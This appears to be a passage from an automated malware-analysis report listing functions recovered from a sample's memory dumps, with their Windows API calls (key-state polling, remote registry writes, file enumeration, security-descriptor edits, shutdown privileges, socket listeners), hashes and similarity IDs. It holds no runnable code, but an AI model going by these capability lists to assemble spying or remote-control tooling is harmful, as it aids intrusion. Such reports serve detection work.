Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 0cc6ad4e60a7c867d1b83d649192f236451bcdb522d6dd3f90db754d3c3938a0
Instruction ID: 3058556797a2696bfd09d1e3cde9e4b94aec7a209f13f047fe54b4e8e5085256
Opcode Fuzzy Hash: 0cc6ad4e60a7c867d1b83d649192f236451bcdb522d6dd3f90db754d3c3938a0
Instruction Fuzzy Hash: 2051AF71204301ABD701AF64EC86FAE7BA9AF94B01F10852DF596D21F2DF70D946CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001AC9C7, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001AC9F8
FindClose.KERNEL32(00000000), ref: 001ACA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ACA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ACA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 001ACAAF
__swprintf.LIBCMT ref: 001ACAFB
__swprintf.LIBCMT ref: 001ACB3E

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

__swprintf.LIBCMT ref: 001ACB92

Part of subcall function 001638D8: __woutput_l.LIBCMT ref: 00163931

__swprintf.LIBCMT ref: 001ACBE0

Part of subcall function 001638D8: __flsbuf.LIBCMT ref: 00163953
Part of subcall function 001638D8: __flsbuf.LIBCMT ref: 0016396B

__swprintf.LIBCMT ref: 001ACC2F
__swprintf.LIBCMT ref: 001ACC7E
__swprintf.LIBCMT ref: 001ACCCD

Strings

%02d, xrefs: 001ACB86, 001ACB90, 001ACBDE, 001ACC2D, 001ACC7C, 001ACCCB
%4d, xrefs: 001ACB38
%4d%02d%02d%02d%02d%02d, xrefs: 001ACAF5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: d013595aa13839344f32f4d9ac3b9c8200c5b114565b608ff6d754380c5bd46d
Instruction ID: 3e869c718b0c25d3787817c846b57be46771a2ec4a62bde61d82b71e2b4e6435
Opcode Fuzzy Hash: d013595aa13839344f32f4d9ac3b9c8200c5b114565b608ff6d754380c5bd46d
Instruction Fuzzy Hash: 82A10EB2508314ABC714EF64C886DAFB7ECFFA5700F404929B595C71A1EB34DA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001AF200, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 001AF221
_wcscmp.LIBCMT ref: 001AF236
_wcscmp.LIBCMT ref: 001AF24D
GetFileAttributesW.KERNEL32(?), ref: 001AF25F
SetFileAttributesW.KERNEL32(?,?), ref: 001AF279
FindNextFileW.KERNEL32(00000000,?), ref: 001AF291
FindClose.KERNEL32(00000000), ref: 001AF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 001AF2B8
_wcscmp.LIBCMT ref: 001AF2DF
_wcscmp.LIBCMT ref: 001AF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 001AF308
SetCurrentDirectoryW.KERNEL32(001FA5A0), ref: 001AF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 001AF330
FindClose.KERNEL32(00000000), ref: 001AF33D
FindClose.KERNEL32(00000000), ref: 001AF34F

Strings

*.*, xrefs: 001AF2B3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 5b7da43af12b74f7bdb2d6add6462fd0b5787603c5c1b596e0ed2c36b1a08474
Instruction ID: e6b5527f4250e8d8515a8fc755aec7a0f3b8092299f95c4ea2f75f3631cf01c6
Opcode Fuzzy Hash: 5b7da43af12b74f7bdb2d6add6462fd0b5787603c5c1b596e0ed2c36b1a08474
Instruction Fuzzy Hash: 7931C27A5002196ADF10DBF4DC58EEE77ADAF4A361F10427EE914D30A0EB30DE86CA50

Uniqueness

Uniqueness Score: -1.00%

Function 001C0AE2, Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001C0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,001CF910,00000000,?,00000000,?,?), ref: 001C0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001C0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001C0D1D
RegCloseKey.ADVAPI32(?), ref: 001C103D
RegCloseKey.ADVAPI32(00000000), ref: 001C104A

Strings

REG_BINARY, xrefs: 001C0FD8
REG_QWORD, xrefs: 001C0F8B
REG_MULTI_SZ, xrefs: 001C0E05
REG_SZ, xrefs: 001C0D5B
REG_EXPAND_SZ, xrefs: 001C0CBA
REG_DWORD, xrefs: 001C0F0E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 3d5689577d04a0bba2249dc96778067976836f08cf6cff0a3130d138c0b765f1
Instruction ID: e8faf26afdce4638072c2869e4a1994d193d5481252b11940a73f9cc99be13ea
Opcode Fuzzy Hash: 3d5689577d04a0bba2249dc96778067976836f08cf6cff0a3130d138c0b765f1
Instruction Fuzzy Hash: E90259752046119FCB14EF24C895E2ABBE5FF99714F04885DF89A9B3A2CB30ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001AF35D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 001AF37E
_wcscmp.LIBCMT ref: 001AF393
_wcscmp.LIBCMT ref: 001AF3AA

Part of subcall function 001A45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001A45DC

FindNextFileW.KERNEL32(00000000,?), ref: 001AF3D9
FindClose.KERNEL32(00000000), ref: 001AF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 001AF400
_wcscmp.LIBCMT ref: 001AF427
_wcscmp.LIBCMT ref: 001AF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 001AF450
SetCurrentDirectoryW.KERNEL32(001FA5A0), ref: 001AF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 001AF478
FindClose.KERNEL32(00000000), ref: 001AF485
FindClose.KERNEL32(00000000), ref: 001AF497

Strings

*.*, xrefs: 001AF3FB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 947596c2638253298b5a70c3c7bf999c5d434861774e16bf5299e7a744f0208d
Instruction ID: 2828a1a022eeb45d4c98a78414d8d33e3f90270435735adaae0d4589e26a34df
Opcode Fuzzy Hash: 947596c2638253298b5a70c3c7bf999c5d434861774e16bf5299e7a744f0208d
Instruction Fuzzy Hash: A631D5795012196FCF109FA4EC88EEE77ADAF4A360F10027DE814A30A0DB34DE86CA54

Uniqueness

Uniqueness Score: -1.00%

Function 001981F7, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0019874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00198766
Part of subcall function 0019874A: GetLastError.KERNEL32(?,0019822A,?,?,?), ref: 00198770
Part of subcall function 0019874A: GetProcessHeap.KERNEL32(00000008,?,?,0019822A,?,?,?), ref: 0019877F
Part of subcall function 0019874A: HeapAlloc.KERNEL32(00000000,?,0019822A,?,?,?), ref: 00198786
Part of subcall function 0019874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0019879D

Part of subcall function 001987E7: GetProcessHeap.KERNEL32(00000008,00198240,00000000,00000000,?,00198240,?), ref: 001987F3
Part of subcall function 001987E7: HeapAlloc.KERNEL32(00000000,?,00198240,?), ref: 001987FA
Part of subcall function 001987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00198240,?), ref: 0019880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0019825B
_memset.LIBCMT ref: 00198270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0019828F
GetLengthSid.ADVAPI32(?), ref: 001982A0
GetAce.ADVAPI32(?,00000000,?), ref: 001982DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001982F9
GetLengthSid.ADVAPI32(?), ref: 00198316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00198325
HeapAlloc.KERNEL32(00000000), ref: 0019832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0019834D
CopySid.ADVAPI32(00000000), ref: 00198354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00198385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001983AB
SetUserObjectSecurity.USER32 ref: 001983BF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 3afc2cba1914727cca9a080247efe082afe8e54fba5ccda1036e7ea9959176f5
Instruction ID: aca30840a74a7db54ec11f075ae90e299cbb7c3d73154f3ac07fbccd96fa06d4
Opcode Fuzzy Hash: 3afc2cba1914727cca9a080247efe082afe8e54fba5ccda1036e7ea9959176f5
Instruction Fuzzy Hash: 45614671904209AFDF009FA5DC84EEEBBBAFF05700F14816AF815A6291DB35DA56CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C0665, Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001C0038,?,?), ref: 001C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001C0737

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001C07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001C086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 001C0AAD
RegCloseKey.ADVAPI32(00000000), ref: 001C0ABA

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4c3d5fc80f9281d01187404dafa65b8cdd8130b4229b176efd40c50b8aefcf4d
Instruction ID: 06c81a2981d112c8a120e22f0dde5c2603b46c86e6d11f9cb305ae7b154135fe
Opcode Fuzzy Hash: 4c3d5fc80f9281d01187404dafa65b8cdd8130b4229b176efd40c50b8aefcf4d
Instruction Fuzzy Hash: 54E14C31204310EFCB15DF24C895E6BBBE5EF99714B04896DF88ADB262DB30E945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001A0219, Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001A0241
GetAsyncKeyState.USER32(000000A0), ref: 001A02C2
GetKeyState.USER32(000000A0), ref: 001A02DD
GetAsyncKeyState.USER32(000000A1), ref: 001A02F7
GetKeyState.USER32(000000A1), ref: 001A030C
GetAsyncKeyState.USER32(00000011), ref: 001A0324
GetKeyState.USER32(00000011), ref: 001A0336
GetAsyncKeyState.USER32(00000012), ref: 001A034E
GetKeyState.USER32(00000012), ref: 001A0360
GetAsyncKeyState.USER32(0000005B), ref: 001A0378
GetKeyState.USER32(0000005B), ref: 001A038A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ff89f896f22953637793e4858a13a7140185d4a5972b1d7a80df64b6648e2402
Instruction ID: e1b4bc7d2710385b69f969c37ba41a2192075ad97f8e14692424c2bae8f2a767
Opcode Fuzzy Hash: ff89f896f22953637793e4858a13a7140185d4a5972b1d7a80df64b6648e2402
Instruction Fuzzy Hash: 4E419C3C9047C96EFF339A6488087B5BEA17F1B344F08805ED6C5465C2D7E599C4C792

Uniqueness

Uniqueness Score: -1.00%

Function 001AF65E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001AF6AB
Sleep.KERNEL32(0000000A), ref: 001AF6DB
_wcscmp.LIBCMT ref: 001AF6EF
_wcscmp.LIBCMT ref: 001AF70A
FindNextFileW.KERNEL32(?,?), ref: 001AF7A8
FindClose.KERNEL32(00000000), ref: 001AF7BE

Strings

*.*, xrefs: 001AF690

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 0fd8ceefb931db3bc50bf5a5dfc0dbe5e5e91538c9071bfd1d6b7f3b9dfcbd4a
Instruction ID: 1df9d75f1479fb08a7ee64fc3516cbe9592559f1c2e6932b7ebb8a776840c24b
Opcode Fuzzy Hash: 0fd8ceefb931db3bc50bf5a5dfc0dbe5e5e91538c9071bfd1d6b7f3b9dfcbd4a
Instruction Fuzzy Hash: E441A17590021A9FCF15DFA4CC85EEEBBB4FF16310F14456AE819A31A1DB309E85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A545F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00198CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00198D0D
Part of subcall function 00198CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00198D3A
Part of subcall function 00198CC3: GetLastError.KERNEL32 ref: 00198D47

ExitWindowsEx.USER32(?,00000000), ref: 001A549B

Strings

, xrefs: 001A5489
SeShutdownPrivilege, xrefs: 001A546B
@, xrefs: 001A548E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 6501cbda66f37b26362e7564646e2035a52abb38b2036766700086d1dbc9e0b9
Instruction ID: 14aa5b0ccb1ac5c9f6d5b99abd148e0d5d5bbb674759685ab0fe1b903ecdb14b
Opcode Fuzzy Hash: 6501cbda66f37b26362e7564646e2035a52abb38b2036766700086d1dbc9e0b9
Instruction Fuzzy Hash: 4A01477965CA012AE72C5274EC4AFBA725AEB0B352F200024FD06D20C2FB544C8181A0

Uniqueness

Uniqueness Score: -1.00%

Function 001B6596, Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001B65EF
WSAGetLastError.WSOCK32(00000000), ref: 001B65FE
bind.WSOCK32(00000000,?,00000010), ref: 001B661A
listen.WSOCK32(00000000,00000005), ref: 001B6629
WSAGetLastError.WSOCK32(00000000), ref: 001B6643
closesocket.WSOCK32(00000000,00000000), ref: 001B6657

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: b17d91d4a520301b5eb978d7edad54406ca1b9f928d2b4c426287e51a0a888a9
Instruction ID: 8f55bd02cd0c5240c5382ae0f24152669416e7334c8c97410f6cb613711eff81
Opcode Fuzzy Hash: b17d91d4a520301b5eb978d7edad54406ca1b9f928d2b4c426287e51a0a888a9
Instruction Fuzzy Hash: 1F218D316002149FCB10EF64C885FAEB7AAEF58720F158169F956E73E1CB74AD41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00141287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

DefDlgProcW.USER32(?,?,?,?,?), ref: 001419FA
GetSysColor.USER32(0000000F), ref: 00141A4E
SetBkColor.GDI32(?,00000000), ref: 00141A61

Part of subcall function 00141290: DefDlgProcW.USER32(?,00000020,?), ref: 001412D8

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: f8a4e8e383f0ee24a2878e0c7769b1b98a5047b7a4cf31738b4a599450f1d2dd
Instruction ID: d363683235c1174e9a2df2271f59d0b9ff7e7b54e241bc6a381b5dd24b07f2a4
Opcode Fuzzy Hash: f8a4e8e383f0ee24a2878e0c7769b1b98a5047b7a4cf31738b4a599450f1d2dd
Instruction Fuzzy Hash: 80A159B1109584BEE62CAF289C98FBF39ADDB51385B358119F406D71B2CF20DDC192B6

Uniqueness

Uniqueness Score: -1.00%

Function 001B6A5A, Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001B80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001B80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001B6AB1
WSAGetLastError.WSOCK32(00000000), ref: 001B6ADA
bind.WSOCK32(00000000,?,00000010), ref: 001B6B13
WSAGetLastError.WSOCK32(00000000), ref: 001B6B20
closesocket.WSOCK32(00000000,00000000), ref: 001B6B34

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: b29c4ebe3923b7ac2ae52d5bb597ac04d8b1532155e0656ddcd348217cbcdf0e
Instruction ID: 4ec249f83269684802365c5fddf57af8de3faac170df958416adf059ef00ea27
Opcode Fuzzy Hash: b29c4ebe3923b7ac2ae52d5bb597ac04d8b1532155e0656ddcd348217cbcdf0e
Instruction Fuzzy Hash: B641A375700210AFEB10BF64DC86F6EB7A9DB58B24F04805CF95AAB3E2DB749D018791

Uniqueness

Uniqueness Score: -1.00%

Function 001C55FD, Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 001C564C
IsWindowEnabled.USER32 ref: 001C565A
GetForegroundWindow.USER32(?,?,00000001), ref: 001C5667
IsIconic.USER32 ref: 001C5675
IsZoomed.USER32 ref: 001C5683

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 244470c19ecc142dcaf491608c5e41d2a719eeea5b829e1f91c41b7a8b9332cc
Instruction ID: 88d33fe052be9d90e000ffe7b5964a06b09c30177295b2e6b55a1ee4f0d51cfb
Opcode Fuzzy Hash: 244470c19ecc142dcaf491608c5e41d2a719eeea5b829e1f91c41b7a8b9332cc
Instruction Fuzzy Hash: 2E110431300A306FE7215F26DC44F6FBB9BEF64760B85402CF806D3251CB30E9828AA4

Uniqueness

Uniqueness Score: -1.00%

Function 001BF121, Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001BF151
Process32FirstW.KERNEL32(00000000,?), ref: 001BF15F

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Process32NextW.KERNEL32(00000000,?), ref: 001BF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 001BF22E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: b593352715e54c8a35b5a111a29ec039e01e6cee4223f3c6512bd2609d75de58
Instruction ID: 2231c617212b0ca0377ebef34b249d2b8c524f3b50673a179a254755f8098d81
Opcode Fuzzy Hash: b593352715e54c8a35b5a111a29ec039e01e6cee4223f3c6512bd2609d75de58
Instruction Fuzzy Hash: F0515D71504311AFD310EF24DC85EABBBE8EFA8710F54482DF595972A1EB70D905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B25E2, Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001B26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001B270C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 529adb2c89731af61e698aac3a5e048c7e01c0985f60dd06b00bf90c9d672f61
Instruction ID: 6b5114e8e8b659307da3e8381314d09a7bb90fb47171f3901549b5c0df4680ba
Opcode Fuzzy Hash: 529adb2c89731af61e698aac3a5e048c7e01c0985f60dd06b00bf90c9d672f61
Instruction Fuzzy Hash: 3641F271A00309BFEB20DE94DC85EFBB7BCEB50724F10406EFA05A6140EB71AE499664

Uniqueness

Uniqueness Score: -1.00%

Function 001AB59E, Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001AB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001AB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001AB655

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
